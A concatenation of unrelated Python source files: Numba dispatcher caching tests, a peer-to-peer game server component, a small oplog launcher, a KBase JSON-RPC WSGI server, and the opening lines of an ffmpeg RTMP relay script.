self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
def test_caching_mutliple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
# Test that a Dispatcher object can be pass as argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_can_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
self.assertEqual(foo(fn), fn)
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
# Slightly modified from the reproducer in issue #4117.
# Before the patch, the compilation time of the failing case is
# much longer than of the successful case. This can be detected
# by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
if __name__ == '__main__':
unittest.main()
|
p2p_server.py
|
import json
import random
from .base_server import BaseServer
from .p2p_connection import P2PConnection
import socket, threading
import queue
import logging
from common.constants import MSG_TYPE, HEARTBEAT
logger = logging.getLogger("sys." + __name__.split(".")[-1])
class P2PComponent(BaseServer):
def __init__(self, request_queue, response_queue, meta_request_queue, meta_response_queue, client_server, port, host="", peers=[]):
"""
:param request_queue:
:param response_queue:
:param client_server: an instance of the client server obj
:type client_server: ClientServer
:param port: Port to listen to (default is client_server.port + 10)
:param host: hostname
:param peers: List of network addresses: ['localhost:8000', ]
The main difference of this type of server (aka. component)
is that Both "accepted" connections and "established" connections are stored using the base_connection class
as an element in self.connections.
"""
BaseServer.__init__(self, request_queue, response_queue, port, host=host)
self.client_server = client_server
self.meta_request_queue = meta_request_queue
self.meta_response_queue = meta_response_queue
self.init_queue = queue.Queue()
# Initial connection to all other peers
for peer in peers:
# exclude self
if peer == "{}:{}".format(host, port):
continue
threading.Thread(target=self.connect_to_peer, args=[peer.split(":")[0], peer.split(":")[1]]).start()
self.listen()
self.set_interval(self.heart_beat, 2)
self.set_interval(self.distribute_clients, 10)
request_thread = threading.Thread(target=self.broadcast_requests)
request_thread.start()
def set_interval(self, func, sec):
"""
Utility function to create intervals
"""
def func_wrapper():
self.set_interval(func, sec)
func()
t = threading.Timer(sec, func_wrapper)
t.start()
return t
def broadcast_requests(self):
"""
Threaded func.
Always check the duplicate queue of the client_server and remove/send any commands from it
:return:
"""
while True:
command = self.client_server.broadcast_queue.get()
logger.debug("Broadcasting {}".format(command))
self.broadcast(json.dumps({"type": MSG_TYPE.BCAST, "command": command.to_json_broadcast()}))
def on_connection(self, connection, address):
"""
called by baseServer whenever a new connection is established
:param connection: socket object
:param address: address of the connection
:return:
"""
logger.info("Connection from Another server {0}:{1}".format(address[0], address[1]))
_id = self.create_id(address[0], address[1])
new_peer = P2PConnection(connection, address, _id, self)
self.connections[_id] = new_peer
self.distribute_clients()
def create_id(self, host, port):
return "peer@{}:{}".format(host, port)
def distribute_clients(self):
"""
Tries to kill a number of clients to improve load balancing
The basic Ideas is:
- Calculate the total number of clients
- Calculate what is called fair_distribution by dividing it by the number of servers
- Kill the number of extra clients that I have
"""
logger.info("Distributing Clients...")
total_clients = 0
num_servers = len(self.connections) + 1
for peer in list(self.connections):
total_clients += self.connections[peer].peer_connections
# Add my own clients
total_clients += len(self.client_server.connections)
fair_distribution = int(total_clients / num_servers)
my_clients = len(self.client_server.connections)
if my_clients <= fair_distribution:
logger.debug("No need to kill clients [Total: {} / Fair: {} / My {}]".format(total_clients, fair_distribution, my_clients))
else:
num_connections_to_kill = my_clients - fair_distribution
connections_to_kill = random.sample(list(self.client_server.connections), num_connections_to_kill)
for client in connections_to_kill:
self.client_server.connections[client].shutdown(b_cast=False)
logger.info("Killed {} clients for load balancing".format(num_connections_to_kill))
def heart_beat(self):
"""
Send a small message to all connections
"""
#logger.debug("Sending heartbeat to {} peers".format(len(self.connections)))
for connection in self.connections:
try:
self.connections[connection].send(json.dumps({
"type": MSG_TYPE.HBEAT,
"payload": {
"num_connections": len(self.client_server.connections)
}
}))
except BaseException as e:
logger.warning("Peer {} -> failed to send heartbeat".format(connection))
self.connections[connection].heartbeat -= HEARTBEAT.INC
self.update_heartbeat_stat()
def update_heartbeat_stat(self):
"""
Kick nodes that have not answered in a while
"""
for peer_id in list(self.connections):
if peer_id in self.connections:
if self.connections[peer_id].heartbeat < 0 :
self.remove_connection(peer_id)
else:
self.connections[peer_id].heartbeat -= HEARTBEAT.INC
def connect_to_peer(self, host, port):
"""
If success, the new connection will be added to self.connections
:param host: ip of the peer
:param port: port of the peer
"""
logger.debug("Attempting to connect to peer {}".format(self.create_id(host, port)))
new_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
new_sock.connect((host, int(port)))
except BaseException as e :
logger.warning("Connection to peer@{}:{} failed [{}]".format(host, port, str(e)))
return
id = self.create_id(host, port)
self.connections[id] = P2PConnection(new_sock, [host, port], id, self)
logger.info("Connection established to peer {}".format(id))
def remove_connection(self, id):
self.connections[id].shutdown()
logger.error("Peer {} removed".format(id))
BaseServer.remove_connection(self, id)
def gather_initial_state(self):
"""
Gathers (blocking) the initial game state from all other servers.
:return: initial game state
"""
for connection in list(self.connections):
try:
self.connections[connection].send(json.dumps({'type': MSG_TYPE.INIT_REQ}))
except BaseException as e:
logger.warning("Peer {} -> failed to request initial game state [{}]".format(connection, e))
# wait for init_res of other servers -> will be put on the init_queue
# right now we take the first response and assume that all servers are in sync with that state
return self.init_queue.get()
def get_current_commands(self):
"""
Gets the current pending commands and puts them back on the queue.
:return: list of jsonified commands
"""
commands = []
while True:
try:
commands.append(self.request_queue.get_nowait())
except queue.Empty:
break
commands_json = []
for command in commands:
self.request_queue.put_nowait(command)
commands_json.append(command.to_json_broadcast())
return commands_json
|
run_op_emitter.py
|
from oplog import Oplog
from multiprocessing import Process
def run():
op_emitter = Oplog()
Process(target=op_emitter.start).start()
if __name__ == "__main__":
run()
|
KBParallelServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from KBParallel.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'KBParallel'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from KBParallel.KBParallelImpl import KBParallel # noqa @IgnorePep8
impl_KBParallel = KBParallel(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'KBParallel'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_KBParallel.run_batch,
name='KBParallel.run_batch',
types=[dict])
self.method_authentication['KBParallel.run_batch'] = 'required' # noqa
self.rpc_service.add(impl_KBParallel.status,
name='KBParallel.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'KBParallel ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
ffmpeg_rtmp_transfer.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2020/6/3 10:06 上午
# @File : rtmp_video_pusher.py
# @author : Bai
# @Software: PyCharm
import os
import time
from multiprocessing import Process
PULL_ADDR = 'rtmp://localhost:1935/live/1234'
PUSH_ADDR = 'rtmp://10.10.14.120:1935/stream/1234'
TMP_FILE_FOLDER = "./data/"
FILENAME = 'test%d.mp4'
PLAYLIST = 'list.txt'
SEG_TIME = '10'
# -rw_timeout在
# ffmpeg version 4.2.1 Copyright (c) 2000-2019 the FFmpeg developers
# built with Apple clang version 11.0.0 (clang-1100.0.33.8)
# 构建的程序上无效
